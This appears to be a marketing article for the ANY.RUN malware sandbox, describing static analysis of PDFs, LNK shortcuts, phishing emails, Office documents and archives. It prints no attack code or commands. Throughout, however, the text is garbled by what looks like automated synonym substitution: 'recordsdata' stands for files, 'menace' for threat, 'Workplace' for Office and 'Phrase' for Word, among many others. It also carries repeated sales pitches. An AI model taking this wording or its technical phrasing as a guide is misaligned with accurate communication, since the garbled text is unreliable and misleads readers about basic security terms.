Sandboxes are synonymous with dynamic malware evaluation. They assist to execute malicious recordsdata in a protected digital surroundings and observe their conduct. Nevertheless, additionally they provide loads of worth by way of static evaluation. See these 5 eventualities the place a sandbox can show to be a great tool in your investigations.
Detecting Threats in PDFs
PDF recordsdata are regularly exploited by menace actors to ship payloads. Static evaluation in a sandbox makes it doable to reveal any menace a malicious PDF accommodates by extracting its construction.
The presence of JavaScript or Bash scripts can reveal a doable mechanism for downloading and executing malware.
Sandboxes like ANY.RUN additionally permits customers to scrutinize URLs present in PDFs to determine suspicious domains, potential command and management (C2) servers, or different indicators of compromise.
Instance:
 |
| Static evaluation of a PDF file in ANY.RUN |
Interactivity permits our customers to govern recordsdata inside a VM as they need, however static Discovery provides much more alternatives.
As a part of this evaluation session, the static module lists a number of URLs that may be discovered contained in the PDF. To research them, we are able to submit every of those for additional sandbox evaluation by merely clicking a corresponding button.
See how static and dynamic evaluation within the ANY.RUN sandbox can profit your safety crew.
E-book a private demo of the service at this time!
Exposing LNK Abuse
LNK recordsdata are shortcuts that direct to an executable file, a doc, or a folder. A sandbox can present a clear view of the LNK file’s properties, comparable to its goal path, icon location, and any embedded instructions or scripts.
Viewing instructions in LNK recordsdata can reveal makes an attempt to launch malicious software program or connect with distant servers.
Static evaluation in a sandbox is especially helpful in figuring out threats that don’t spawn a brand new course of. These could be tough to detect by dynamic evaluation alone.
Instance:
 |
| The command line arguments proven within the static module reveal malicious exercise |
Inspecting the contents of LNK recordsdata might help you detect assaults earlier than they start.
On this sandbox session, we are able to uncover each element concerning the LNK file, together with its command line arguments which present that the file is configured to obtain and execute a payload from a malicious URL.
Investigating Spam and Phishing Emails
Electronic mail stays probably the most frequent vectors for malware distribution. A sandbox helps you to add an e-mail file to the service and analyze it safely to identify spam and hidden malicious components quicker and with none threat to your infrastructure.
A sandbox exhibits an e-mail preview and lists metadata and Indicators of Compromise (IOCs). You’ll be able to study the content material of the e-mail with out opening it and examine the metadata that gives details about the e-mail’s origin, timestamps, and different related particulars.
The ANY.RUN sandbox additionally integrates RSPAMD, an open-source module that assigns a phishing rating to every analyzed e-mail and shows all of its components utilizing these options:
- Header Evaluation: Examines e-mail headers for sender authenticity and anomalies.
- Status Checks: Identifies identified spam/malware sources utilizing DNSBLs and URIBLs.
- Bayesian Filtering: Classifies emails primarily based on probabilistic evaluation.
In ANY.RUN, you may transfer past static evaluation and work together with the e-mail immediately such as you would by yourself laptop. This implies you may obtain and open attachments, together with password-protected ones, or comply with by your complete phishing assault, ranging from the preliminary hyperlink.
Instance:
 |
| Particulars of an .eml file static evaluation |
All content material inside EMAIL recordsdata is extracted and made accessible by static evaluation within the sandbox, permitting customers to view particulars about it even with out accessing the VM itself.
On this evaluation session, we are able to observe a .RAR attachment which accompanies the e-mail. Provided that one of many recordsdata situated within this archive is an executable named “Business Bill PDF”, we are able to immediately assume its malicious nature.
To investigate the executable, we are able to merely click on the “Submit to research” button and launch a brand new sandbox session.
Analyzing Suspicious Workplace Paperwork
Microsoft Workplace paperwork, comparable to Phrase, Excel, and PowerPoint ones, are one of many main safety dangers in each company and private settings. Sandbox static evaluation could be employed to scrutinize numerous components of such paperwork with out opening them. These embody:
- Content material: Sandbox static evaluation lets you study the doc’s content material for indicators of social engineering techniques, phishing makes an attempt, or suspicious hyperlinks.
- Macros: Attackers usually exploit Visible Primary for Functions (VBA) code in Workplace paperwork to automate malicious duties. These duties can vary from downloading and executing malware to stealing delicate knowledge. ANY.RUN exhibits your complete execution chain of the script, enabling you to check it step-by-step.
- Photos and QR Codes: Steganography methods let attackers conceal code inside pictures. Sandbox static evaluation is able to extracting this hidden knowledge. QR codes embedded inside paperwork may additionally include malicious hyperlinks. A sandbox can decode these and expose the potential threats.
- Metadata: Details about the doc’s creation, modification, writer, and so forth. might help you perceive the doc’s origin.
Instance:
 |
| The sandbox can present a preview of Workplace recordsdata |
Microsoft Workplace recordsdata are available in numerous codecs, and analyzing their inner construction can generally be difficult. Static Discovery for Workplace recordsdata means that you can study macros with no need further instruments.
All embedded recordsdata, together with pictures, scripts, and executable recordsdata, are additionally accessible for additional evaluation. QR codes are detected throughout static evaluation, and customers can submit a brand new process that opens the content material encoded in these codes, comparable to URLs.
On this session, static evaluation makes it doable to see that the analyzed .pptx file accommodates a .zip archive.
Trying Inside Malicious Archives
Archives like ZIP, tar.gz, .bz2, and RAR are regularly used as means to bypass fundamental detection strategies. A sandbox surroundings gives a protected and remoted area to research these recordsdata.
As an illustration, sandboxes can unpack archives to disclose their contents, together with executable recordsdata, scripts, and different probably malicious parts. These recordsdata can then be analyzed utilizing the built-in static module to reveal their threats.
Instance:
 |
| ZIP file construction displayed within the static evaluation window |
In ANY.RUN, customers can submit recordsdata for brand new evaluation immediately from archived recordsdata from the static discovery window. This eliminates the necessity to obtain or manually unpack them inside a VM.
On this evaluation session, we as soon as once more see an archive with recordsdata that may be studied one after the other to find out whether or not any further evaluation is required.
Conduct Static and Dynamic Evaluation in ANY.RUN
ANY.RUN is a cloud-based sandbox with superior static and dynamic evaluation capabilities. The service helps you to scan suspicious recordsdata and hyperlinks and get the primary outcomes on their menace degree in beneath 40 seconds. It provides you a real-time overview of the community site visitors, registry actions, and processes occurring throughout malware execution, highlighting malicious conduct and the techniques, methods, and procedures (TTPs).
ANY.RUN gives you with full management over the VM, making it doable to work together with the digital surroundings identical to on a typical laptop. The sandbox generates complete stories that function key menace info, together with indicators of compromise (IOCs).
Begin utilizing ANY.RUN at this time totally free and luxuriate in limitless malware evaluation in Home windows and Linux VMs.